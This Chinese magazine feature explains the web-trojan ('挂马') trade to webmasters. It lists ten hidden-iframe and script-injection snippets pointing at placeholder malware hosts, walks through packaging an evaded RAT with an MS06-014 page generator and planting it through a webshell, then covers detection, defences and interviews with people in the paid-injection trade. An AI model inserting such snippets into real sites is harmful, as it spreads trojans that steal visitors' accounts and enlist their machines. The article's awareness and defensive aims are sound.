揭秘网站挂马行业

站长们经常会在自己的页面内看到<iframe src="http://127.0.0.1" height=0 width=0></iframe>类似的并不是站长自己加上的语句。一些经常接触此类代码的站长会语重心长的告诉你：站点被挂马了！那么，这小小一段代码，究竟神奇到什么程度？今天《站长Z周刊》的特别企划栏目就带大家一起走进这个边缘行业：网页挂马

什么是网页挂马？

网页挂马指的是把一个木马程序上传到一个网站里面然后用木马生成器生一个网马，再上到空间里面！再加代码使得木马在打开网页是运行。网页挂马的方法多种多样。

现在很多网站都被挂上了马，身为站长，恐怕是最怕的问题，一旦事发，影响用户是小，一旦被google贴上此网站可能有病毒的标签，恐怕会给网站带来很大的损失，下面就对一些常用的挂马方式做下分析
一：iframe挂马
<iframe src=地址 width=0 height=0></iframe>
<iframe>是内嵌框架,跟是否被挂马没有关系,可以在html里显示另一个网页,关于框架的问题可以在百度里搜,有很多具体用法
被挂马后就是中了木马病毒,轻的链到人家写入的网页,重的资料被盗,程序被破坏,注意安好杀毒软件.

iframe用法:
iframe可以嵌在网页中的任意部分,举个例子：
<iframe width=420 height=330 frameborder=0 scrolling=auto src=URL></iframe>，这里的URL可以是相对路径，也可以是绝对路径,
width表示宽度，height表示宽度，可根据实际情况调整。
scrolling表示是否显示页面滚动条，可选的参数为auto、yes、no，如果省略这个参数，则默认为auto。
然后给这个iframe命名,方法是<iframe name=**>，如命名为baidu，写入这句HTML语言<iframe width=420 height=330 name=baidu frameborder=0 src=http://www.chinaz.com></iframe>，
再打开这个网页的时候就会有一个420*330的区域显示百度的页面.如果想引入其它页面,可以在网页上写超链接语句：<a href="要显示的页面链接地址">

如果把frameborder设为1，效果就像文本框一样

二:js文件挂马

首先将以下代码
document.write("<iframe width=0 height=0 src=地址></iframe>");
保存为xxx.js，
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀

四:body挂马

<body onload="window.location=地址;"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML +
<iframe src="http://www.xxx.com/muma.htm/"></iframe>;

六:css中挂马

body {
background-image: url(javascript:document.write("<script src=http://www.XXX.net/muma.js></script>"))}

七:JAJA挂马

<SCRIPT language=javascript>
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>

九:伪装调用：

<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href="http://www.chinaz.com(迷惑连接地址，显示这个地址指向木马地址)" onMouseOver="www_chinaz_com(); return true;"> 页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_chinaz_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,
width=800,height=600,left=10,top=10");
}
</SCRIPT>

网页是如何被挂马的

很多朋友都碰到过这样的现象：打开一个网站，结果页面还没显示，杀毒软件就开始报警，提示检测到木马病毒。有经验的朋友会知道这是网页病毒，但是自己打开的明明是正规网站，没有哪家正规网站会将病毒放在自己的网页上吧？那么是什么导致了这种现象的发生呢？其中最有可能的一个原因就是：这个网站被挂马了。

    挂马这个词目前我们似乎经常能听到，那么什么是挂马呢？挂马就是黑客入侵了一些网站后，将自己编写的网页木马嵌入被黑网站的主页中，利用被黑网站的流量将自己的网页木马传播开去，以达到自己不可告人的目的。例如很多游戏网站被挂马，黑客的目的就是盗取浏览该网站玩家的游戏账号，而那些大型网站被挂马，则是为了搜集大量的肉鸡。网站被挂马不仅会让自己的网站失去信誉，丢失大量客户，也会让我们这些普通用户陷入黑客设下的陷阱，沦为黑客的肉鸡。下面就让我们来了解这种时下最流行的黑客攻击手段。

挂马的核心：木马

    从“挂马”这个词中我们就可以知道，这和木马脱离不了关系。的确，挂马的目的就是将木马传播出去，挂马只是一种手段。挂马使用的木马大致可以分为两类：一类是以远程控制为目的的木马，黑客使用这种木马进行挂马攻击，其目的是为了得到大量的肉鸡，以此对某些网站实施拒绝服务攻击或达到其他目的（目前绝大多数实施拒绝服务攻击的傀儡计算机都是挂马攻击的受害者）。另一类是键盘记录木马，我们通常称其为盗号木马，其目的不言而喻，都是冲着我们的游戏帐号或者银行帐号来的。目前挂马所使用的木马多数属于后者。

木马的免杀伎俩

    作为挂马所用的木马，其隐蔽性一定要高，这样就可以让用户在不知不觉中运行木马，也可以让挂马的页面存活更多的时间。黑客为了让木马躲避杀毒软件的查杀，使用的伎俩很多。通常使用的方法有：
    加壳处理：关于壳的概念我们曾经介绍过，就是为了让别人无法修改编译好的程序文件，同时压缩程序体积。木马经过加壳这一道工序后就有可能逃过杀毒软件的查杀，这也是为什么我们装了杀毒软件还会感染老病毒的原因。虽然目前的杀毒软件都支持对程序脱壳后再查杀，但只局限于一些比较热门的加壳程序，例如aspack、UPX等，而碰上一些经过冷门加壳程序处理后的木马时，就无能为力了。所以加壳仍是黑客比较常用的免杀伎俩之一。

冷门的加壳程序
    修改特征码：杀毒软件是根据病毒特征码来判定一个程序是否是病毒的。杀毒软件在对程序进行检测时，如果在程序中发现了病毒特征码，就将该程序判定为病毒。黑客当然也明白这个道理，于是他们会修改木马中被定为特征码的部分代码，将其加密或使用汇编指令将其跳转，这样杀毒软件就无法在木马中找到病毒特征码，自然也就不会将其判定为病毒了。

    虽然这两种方法都可以躲过杀毒软件的查杀，但是我们还是有办法阻止木马运行的，具体方法将在防范部分讲到。那么木马是如何“挂”在网站上的呢？这里我们以“灰鸽子”木马为例，演示一下黑客挂马的过程。演示用的“灰鸽子”木马已经经过免杀处理，杀毒软件无法查杀。
   
潜伏的攻击者：网页木马

    为什么我们一打开网页就会运行木马程序，木马又是如何“挂”在网站上的呢？这就要涉及“网页木马”这个概念。

    网页木马就是将木马和网页结合在一起，打开网页的同时也会运行木马。最初的网页木马原理是利用IE浏览器的ActiveX控件，运行网页木马后会弹出一个控件下载提示，只有点击确认后才会运行其中的木马。这种网页木马在当时网络安全意识普遍不高的情况下还是有一点使用价值的，但是其缺点是显而易见的，就是会出现ActiveX控件下载提示。当然现在很少会有人去点击那莫名其妙的ActiveX控件下载确认窗口。

    在这种情况下，新的网页木马诞生了。这类网页木马通常利用了IE浏览器的漏洞，在运行的时候没有丝毫提示，因此隐蔽性极高。可以说，正是IE浏览器层出不穷的漏洞造成了如今网页木马横行的网络。例如最近的IE浏览器漏洞MS06-014，就可以利用来制作一个绝对隐蔽的网页木马。下面让我们看看利用MS06-014制作网页木马的过程。

    网页木马当然得有木马程序，这里我们使用上文中提到的“灰鸽子”木马。然后我们要下载一个MS06-014网页木马生成器。接着还要一个网页空间，三者准备完毕后，就可以开始测试了。

生成网页木马
    首先将木马程序上传到网页空间中。运行“MS06-014木马生成器”，在“木马地址”中填入已经上传到空间中的木马网址，并勾选下方的“是否隐藏源码”选项。这个选项的作用是当网页木马运行后，会自动清空网页源文件，用户即使起了疑心也无法找到痕迹。当然清空的是用户打开的源文件，而网页木马却不受影响。点击“生成网马”按钮即可在程序的同目录生成一个名为muma.htm的网页木马

配置网页木马
    继续进行网页木马的配置，在“欲加密的网页”中浏览选中生成的网页木马。网页木马在运行时会利用IE的漏洞，其中肯定存在漏洞利用代码，这些代码会被杀毒软件检测出来，因此要想隐蔽地运行网页木马，加密木马程序还不够，还需对网页木马进行加密。“MS06-014木马生成器”的“加密方式”中提供了四种网页的加密方式，分别是：空字符加密、转义字符加密、Escape加密和拆分特征码。这里我们使用“转义字符加密”加密方式，选中“转义字符加密”选项后点击“加密”按钮，免杀的网页木马就生成了。将该加密过的网页木马上传到网页空间中即可。

寻找缺陷网站，写入网页木马
    网页木马准备完毕，就等着寻找挂马的目标网站了。此时黑客会到处搜索，寻找有脚本缺陷的网站程序，找到后利用网站程序的漏洞入侵网站，并得到网站的一个webshell。这时我们可以编辑网站首页的内容，将挂马的代码插入即可。代码为：<iframe src="http://127.0.0.1/muma.htm" width="0" height="0" frameborder="0"></iframe>，src参数后面的是网页木马的地址。当我们打开这个网站的首页后，会弹出网页木马的页面，这个页面我们是无法看到的，因为我们在代码中设置了弹出页面的窗口长宽各为0。此时木马也已经悄悄下载到本机并运行了。我们可以看到，网站的首页显示正常，杀毒软件并没有任何反应，而木马却已经运行了，可见木马的隐蔽性很高，危害也相当严重。成功运行木马

铲除网站“挂马”毒瘤
    “挂马”攻击已经成为目前最流行的攻击方式，面对数量庞大的“挂马”网站，我们该如何防御呢？作为一名网站站长，我们又如何知道自己的网站被人挂马了呢？

    站长防范：如果你是一名站长，可以对网站首页以及其他主要页面的源代码进行检查，用记事本打开这些页面后，以“<iframe>”为关键字进行搜索，找到后可以查看是否是挂马代码。不过碰上有经验的黑客，会编写一段代码将整句挂马代码进行加密，这样我们就很难找到网页中的挂马代码。这时可以将所有网页文件按修改时间进行排序，如果有个别网页被修改，我们可以很快地发现。

    当然，最好的办法就是设置好网站的权限，对于使用动态语言编写的网站，一般对网页文件是不需要改动的，所有的数据都存储在数据库中。因此我们可以只对数据库所在的文件夹设置写权限，而对整个网站文件夹设置只读权限，这样即使网站存在漏洞，黑客也别想通过脚本漏洞入侵网站，更别说在主页上挂马了。

    普通用户防范：普通用户关心的自然是如何防范“挂马”攻击。既然杀毒软件在网页木马面前成了“睁眼瞎”，而我们又无法感知网站是否被“挂马”。在这种情况下，我们岂不是任人宰割？我们已经知道网页木马的运行原理利用了IE浏览器的漏洞，因此只要我们及时更新系统补丁就可以让网页木马失效了。开启系统“自动更新”的方法为：右键点击“我的电脑”，选择“属性”，切换到“自动更新”标签，选中其中的“自动（推荐）”即可。此外我们也可以使用“360安全卫士”等具有补丁更新功能的软件。运行“360安全卫士”后，点击“修复”→修复系统漏洞，即可查看系统的补丁状态，勾选未安装的补丁下载即可。使用“360安全卫士”更新补丁

    杀毒软件在网页木马前失去了作用，不代表我们就拿它没辙。我们可以使用一款名为System Safety Monitor（以下简称为SSM）的软件，在它的监控下，没有一个木马病毒可以躲过它的眼睛。安装完毕后运行，其自动最小化到系统任务栏，开始对系统进行监控。SSM的监控功能相当强悍，系统内部的一些操作也会被监控并提醒。让我们看看SSM对付这种加密过的网页木马效果如何，打开挂有木马XXXX.com程序，其意思是IE浏览器想运行XXXX.com这个可执行程序。IE浏览器对于可执行程序是提示下载的，而不会直接运行，由此可见其中的猫腻，此时我们点击“拒绝”按钮就可以阻止网页木马的运行了。SSM的监控原理和杀毒软件不同，其最大特点是可以监控到所有的网页木马，由于其使用较一般安全软件来得复杂，因此建议中高级用户使用。

网站挂马行业揭秘

经常会在一些论坛和站点看到这样类似的广告：“万IP120元，日结！联系QQ：XXXXX”而往往加了QQ以后，都会被要求在页面挂上一段类似开篇时提到的<iframe src="http://127.0.0.1" height=0 width=0></iframe>，而打开中间的链接地址，往往只会有一个站长统计显示。如果您曾经接触过这样类型的情景，那么恭喜您，这就是传说中的挂马行业大军了。在做这篇报道时，小编专门约了两名与挂马行业有密切联系的人，一名是曾经的挂马销售员，另外一名是挂马站长。从这两位业内人士描述中，让我们一起了解这个神秘行业。

  挂马方：金字塔结构形式

“一般，挂马的目的无非是为了盗取游戏帐号、QQ密码以及服务器资源和刷流量。”挂马业内销售小K这样跟小编说道挂马目的。挂马者先是找技术人员写出马来，而后招募马仔以万IP180-200的价格出货，一般，程序员写出来的马又分免杀加壳和不免杀加壳以及不免杀等几个类型。（免杀的意思就是装杀毒软件并不能扫描出有病毒木马来。）而一线的马仔又把从挂马者那拿到的代码以万IP160-180的价格出货给下一层销售人员，再由下一层的销售人员通过QQ、邮件、广告等方式具体销售给挂马的站长们。一般来讲一个新马出来的时间不会太长就会失效。而且幕后的老板（也就是挂马者）很容易跑路，所以，挂马时都采取日结的方式（每天现金结算一次）。而统计IP则是采用页面上放置的站长统计。

站长：多数挂马站长知情并乐此不疲

“其实我知道这是个缺德的行为，但是站长也得吃饭呀！”站长小Z在接受访问时无奈的表示。自从06年以来，中国站长网赚圈就低迷了许多，钱越来越不容易赚。联盟月结算，扣量，延发拥金等种种因素，让更多的站长选择了挂马这种来钱快的行业。“我有很多的站点，就是你们口中的垃圾站，一个站一天几千IP，如果做网络联盟，一个月也就200左右，而挂马，一个月大几千。但是，也是有选择性的挂，比如一些擦边图片站，一些俗站。正规类的站点是打死也不挂的。”小Z谈到挂马和联盟收入的差距时说道。收入差距大，佣金支付快，虽然也会经常遇到挂了一天就跑路的，但损失也不大。但也并不是所有站长像小Z这样幸运。另一名曾经挂马的站长小X就因为挂马被抓进去呆了一段时间。“本来以为挂马并没什么，谁能想到是恶意传播病毒？被相关机关抓去了才知道自己犯法了。”小X至今谈到被抓当晚还心有余悸。但是挂马者也不是什么站都收的，流量上要有限制，一般起点是日IP1000以上，并且还要纯流量。闹腾最大动静的2007年，很多站点都被挂了马，有主动的，有被动。当时作为业内最大站点的中国站长站为此还专门策划了个专题去号召站长们抵制挂马，净化中国网络环境。

 

后记

随着中国网络法制观念的健全和完善，更多的边缘行业被法律制裁。挂马亦属其中，更多的站长也远离了站点挂马这样的违反犯罪行为，而选择本地项目合作、网络团队等多样性的站点盈利模式，随着中国互联网的发展，挂马行业将会淡出互联网历史舞台。站长Z周刊特别企划了此篇报道，旨在为更多站长了解和熟悉这个黑暗行业，正如中国站长站号召的一样：抵制挂马，净化中国网络环境，从自己站点做起。